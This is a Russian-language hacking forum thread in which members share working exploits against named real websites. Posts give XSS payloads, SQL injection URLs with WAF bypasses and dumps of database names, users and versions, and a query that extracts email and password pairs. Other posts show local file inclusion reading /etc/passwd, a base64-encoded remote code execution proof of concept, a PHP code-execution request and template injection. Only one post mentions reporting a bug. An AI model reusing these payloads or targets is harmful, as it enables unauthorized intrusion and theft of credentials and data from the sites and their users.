Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    Code:
    https://www.edmunds.com/a/?":""});alert(document.cookie);//
    http://oregonstate.edu/training/course_search.php?subject="><script>alert(999)</script>
    https://lyricstranslate.com/?page="><script>alert(7889789)</script>
    http://720pizle.com/ara.asp?a="><script>alert(7889789)</script>
    http://epinions.com/search/books/63715?"><script>alert(6456456)</script>
    https://mgronline.com/south/1232/search?searchTxt="><script>alert(045839)</script>
    http://naszemiasto.pl/firmy/,polska,78425,21.html?miasto="><script>alert(4389)</script>
    http://www3.gogoanime.tv/"><script>alert(4389)</script>
    https://bursadabugun.com/ruya-tabirleri/?q[keyword]="><script>alert(4389)</script>
    https://computerhoy.com/listas/internet/mejores-cascos-auriculares-inalambricos-2016-32365?page=</title><script>alert(4389)</script>
    https://warframe.market/</script><script>alert(4389)</script>
    https://goal.in.th/%E0%B8%9C%E0%B8%A5%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B8%A2%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87/?Line="><script>alert(4389)</script>
    http://www.gazetevatan.com/Default.aspx?aType=';alert();//
    http://thebitcoincode.com/video.php?poster="><script>alert(4389)</script>
    https://gamebanana.com/tools?"><script>alert(4389)</script>
    https://indosport.com/"><script>alert(4389)</script>
    http://brasilescola.uol.com.br/"><script>alert(4389)</script>
    https://watchasian.co/"><script>alert(4389)</script>
    https://mgronline.com/south/1232/search?searchTxt="><script>alert(4389)</script>
    http://portail.free.fr/services/pagesjaunes/bons-plans.php?where="><script>alert(4389)</script>
    http://minnstate.edu/jobs/searchResults.php?"><script>alert(4389)</script>
    https://eadaily.com/"><script>alert(00088)</script>
    http://projectfreetv.bz/hd/project.php?title=<script>alert(4389)</script>
    http://cnrtl.fr/lexiques/morphalou/licence_morphalou.php?version="><script>alert(4389)</script>
    
     
    #301 Vip77, 23 Mar 2018
    Last edited: 23 Mar 2018
    man474019 and BabaDook like this.
  2. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    https://forum.antichat.ru/threads/426171/page-6
    Выкладывал уже
     
    sepo, BabaDook and crlf like this.
  3. fiji

    fiji New Member

    Joined:
    19 Oct 2018
    Messages:
    3
    Likes Received:
    1
    Reputations:
    8
    Code:
    http://wrestling.work/eventchapter.php?id=2%27+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(tione_igs.applications)where(0x00)in(@x:=concat(@x,0x3c62723e,user,0x3a,pass))))x),4,5,6,7,8,9,10--+1
     
    shell_c0de likes this.
  4. lukeone

    lukeone Member

    Joined:
    7 May 2017
    Messages:
    6
    Likes Received:
    17
    Reputations:
    1
    Code:
    http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
    
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK
    Vector: AND MAKE_SET([INFERENCE],[RANDNUM])
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)#
    Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

    available databases [110]:
    [*] 1poverennaya.ru
    [*] 3dschool.akadem-art.ru
    [*] acmoda_fashion
    [*] akadem-art.ru
    [*] amsterdam.ru
    [*] amur-tiger
    [*] api.olit.su
    [*] apteki.ru
    [*] at
    [*] ayashiclimat
    [*] berendeevo
    [*] bitrix_55
    [*] cargoflies.ru
    [*] civlife
    [*] cookies
    [*] cpa
    [*] cpa-monsters.ru
    [*] crypto
    [*] cv79250_db
    [*] db1050525_rpfm
    [*] dev.check-car.io
    [*] dish.ru
    [*] docdoc
    [*] dojoy.ru
    [*] dreamwood
    [*] el-torg.ru
    [*] fefectu_fikcii
    [*] game4art.ru
    [*] gidrolica
    [*] greencontinent.bio
    [*] hockeyfamily
    [*] hostel
    [*] information_schema
    [*] informed
    [*] irasmarovoz
    [*] kordik-psyhelp
    [*] kz_health
    [*] lecture
    [*] led1080.ru
    [*] lesspas
    [*] light
    [*] lotmo
    [*] mailer
    [*] maxphoto
    [*] medelement.ru
    [*] messenger
    [*] metalnastil.ru
    [*] miel.ru
    [*] modelery
    [*] mototelega
    [*] mysql
    [*] nanokeratin-shop
    [*] new.olit.su
    [*] new_olit
    [*] newoleg
    [*] olit_su
    [*] olmatveeva.ru
    [*] pdns
    [*] performance_schema
    [*] photoluxor
    [*] picture
    [*] pineapple
    [*] powerdns
    [*] prazdnik
    [*] pressnastil.ru
    [*] profdoctors.ru
    [*] push
    [*] radio.ru
    [*] recraft.ru-yii
    [*] redmine
    [*] rekomendacii
    [*] remcraft.ru
    [*] remcraft.ru-new
    [*] remcraft.ru-new1!!
    [*] resthistory
    [*] rlogistika
    [*] seobirds
    [*] seorakerus
    [*] seowant.ru
    [*] sflegaladvice
    [*] siluet.su
    [*] sitemanager0
    [*] skld
    [*] social
    [*] sound_olit
    [*] sound_olit_su
    [*] sport
    [*] spz-rus.ru
    [*] stroynastil.ru
    [*] stroynastil.ru1
    [*] sveng
    [*] telegramm
    [*] test
    [*] umgear.ru
    [*] union.ru
    [*] union.ru-old
    [*] vault-pdm.ru
    [*] velespro.com
    [*] videoportal
    [*] visagestyle
    [*] water-check.ru
    [*] wawtalk.io
    [*] webmonsters
    [*] whoknow.ru
    [*] yandex_bot
    [*] yiilab
    [*] ymga.ru
    [*] ymga.ru-new
    [*] zabbix
    [*] zaem-info.ru
     
    karkajoi, Mie2soft and Octavian like this.
  5. Franky_T

    Franky_T Level 8

    Joined:
    6 Nov 2018
    Messages:
    21
    Likes Received:
    66
    Reputations:
    58
    Здравствуйте)
    На форуме первый день, попробую тоже.

    1. SQL-инъекция с обходом WAF
    Code:
    GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222,/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,1010,1111,1212,1313,1414,1515,1616,1717+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+ HTTP/1.1
    Host: www.cdlmacapa.com.br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    2. SQL-инъекция с выводом в ошибке
    Code:
    http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user()+limit+0,1)))
    
     
  6. Franky_T

    Franky_T Level 8

    Joined:
    6 Nov 2018
    Messages:
    21
    Likes Received:
    66
    Reputations:
    58
    Еще немножко - теперь LFI.
    Code:
    http://www.unisescon.org.br/index.php?pagina=/etc/passwd&evento=13774
    
    https://www.fecic.es/admin/index.php?pagina=descargar&doc=../../../../../../../../../../../../etc/passwd&linial=true&seccio=premsa&tipus=1&[email protected]```
    
    http://www.bolyai-zenta.edu.rs/index.php?page=../../../../../../../../../../../etc/passwd
    
    http://www.crt.unige.it/EN/index.php?pagina=php://filter/convert.base64-encode/resource=/etc/passwd
    
    
     
    #306 Franky_T, 10 Nov 2018
    Last edited: 10 Nov 2018
    crlf, dmax0fw, Pirnazar and 2 others like this.
  7. qwaszx000

    qwaszx000 Member

    Joined:
    10 Feb 2018
    Messages:
    26
    Likes Received:
    14
    Reputations:
    7
    Code:
    https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20
    
    r[email protected]
    5.5.62
    bible_history
     
  8. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,369
    Likes Received:
    869
    Reputations:
    20
    Все было бы хорошо, но оно гуглится и похоже этой баге года два уже.
     
    Spinus and crlf like this.
  9. Numb

    Numb New Member

    Joined:
    4 Feb 2019
    Messages:
    2
    Likes Received:
    3
    Reputations:
    1
    qwaszx000 and BabaDook like this.
  10. Numb

    Numb New Member

    Joined:
    4 Feb 2019
    Messages:
    2
    Likes Received:
    3
    Reputations:
    1
    #310 Numb, 15 Feb 2019
    Last edited: 16 Feb 2019
    BenderMR likes this.
  11. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    SQLi:
    SoftwareOnRent
    Code:
    http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,concat_ws(0x7c,database(),%20user(),version()),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+&catid=1&compid=135

    SOR|[email protected]|5.5.56-MariaDB

    Code:
    http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,group_concat(column_name),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27--+&catid=1&compid=135
    SecurityDealOnline

    Code:
    http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20concat_ws(0x7c,database(),version()))))--+
    
    
    bluewings|[email protected]|5.6.39-cll-lve

    Code:
    http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20)))--+
    
    BrandTagz
    Code:
    http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,concat_ws(%27|%27,%20database(),user(),version()),3,4,5,6,7,8,9,10,11--+&&product=Dress%20Shirts
    
    [brandtag|[email protected]|5.6.39-cll-lve]

    Code:
    http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,%20group_concat(concat_ws(':',email, password),0x0a),3,4,5,6,7,8,9,10,11%20from user--+&&product=Dress%20Shirts
    








     
  12. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Rcadia
    Code:
    http://www.rcadia.com/page.php?pageID=-23%20union%20select%2012,3,4,5,concat_ws(0x7c,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19
    
    [email protected]|rcadia2|5.6.34-log

    Городской совет, Черкассы
    Code:
    http://chmr.gov.ua/myrada/html/195784.php?id=-195784%20/*!50000uNioN*/%20select%20concat_ws(0x7c, database(),user(),version())--+
    
    myrada|[email protected]|5.5.24-log

    Индусо шоп
    Code:
    https://www.royalenterprises.co.in/category.php?cid=9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
    

    myp13eyd_royal2|[email protected]|5.6.32-78.1

    Code:
    https://www.royalenterprises.co.in/category.php?cid=-9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18 from /*!50000infoRmAtiOn_sChEma*/.tables+/*!50000WhErE*/+/*!50000table_schema*/=database()--+#
    



     
  13. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    way.com
    Code:
    https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844
    Parameter: pid (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    

    Code:
    http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))
     
    #313 RWD, 16 Mar 2019
    Last edited: 17 Mar 2019
    BenderMR likes this.
  14. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    564
    Likes Received:
    1,070
    Reputations:
    357
    Code:
    https://temp-mail.org/en/?email="/onfocus='alert`lul`'/autofocus="@tmailcloud.net
    
     
    man474019, BabaDook, sysjuk and 5 others like this.
  15. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    602
    Likes Received:
    459
    Reputations:
    65
    rce (=

    шттп://www.t| u | torialspoint.com/

    [​IMG]


    Stat on similarweb =)

    [​IMG]



    PoC
    Code:
    from base64
    UE9TVCBodHRwczovL3RwY2cudHV0b3JpYWxzcG9pbnQuY29tL3RwY2cucGhwIEhUVFAvMS4xCkNvbnRlbnQtTGVuZ3RoOiA3MgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApIb3N0OiB0cGNnLnR1dG9yaWFsc3BvaW50LmNvbQoKbGFuZz1zaCZkZXZpY2U9JmNvZGU9LewmZXh0PXNoJmNvbXBpbGU9MCZleGVjdXRlPWVudiZtYWluZmlsZT1leGVjJnVpZD0x
    
     
    #315 lifescore, 4 Sep 2019
    Last edited: 25 Nov 2019
  16. Pop-Xlop

    Pop-Xlop Member

    Joined:
    26 Aug 2019
    Messages:
    20
    Likes Received:
    22
    Reputations:
    8
    ZoneAlarm
    Code:
    https://forums.zonealarm.com/ajax/render/widget_php
    POST:
    widgetConfig[code]=phpinfo();
    
     
  17. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    Blind XSS в админке Hostinger, простите за ру сайт
    https://crm.hostinger.io/client/29640132
    PS: Зарепортил сказали спасибо и продлили хостинг на один месяц
    [​IMG]
     
    #317 Octavian, 15 Feb 2020
    Last edited: 15 Feb 2020
    HAXTA4OK and crlf like this.
  18. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    Есть такой кардер который украл 36 милионов $ и отсидел 10 лет, сейчас у него канал на ютубе "Люди PRO", сам смотрю )
    У него свой кэшбэк сервис в котором минут за 5 нашел Server side template injection, правда полезную нагрузку вывесть не смог (
    https://secretdiscounter.com/ru/search/coupon?limit=30&query={{7*7}}.
    + XSS
    https://secretdiscounter.com/ru/"//><script>alert(5)</script>
     
    #318 Octavian, 25 Mar 2020
    Last edited: 25 Mar 2020
    BenderMR and fandor9 like this.
  19. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    63
    Likes Received:
    15
    Reputations:
    18
    General Inspectorate for Emergency Situations

    Генеральная инспекция для чрезвычайных ситуаций

    Code:
    https://www.igsu.ro/index.php?pagina=materiale_preventive%3E%3Cscript%3Ealert(666)%3C/script%3E
     
  20. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    63
    Likes Received:
    15
    Reputations:
    18
    Promotora Española de Lingüística (Proel)
    Code:
    http://www.proel.org/index.php?sw=%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&pagina=searchresult
     
Loading...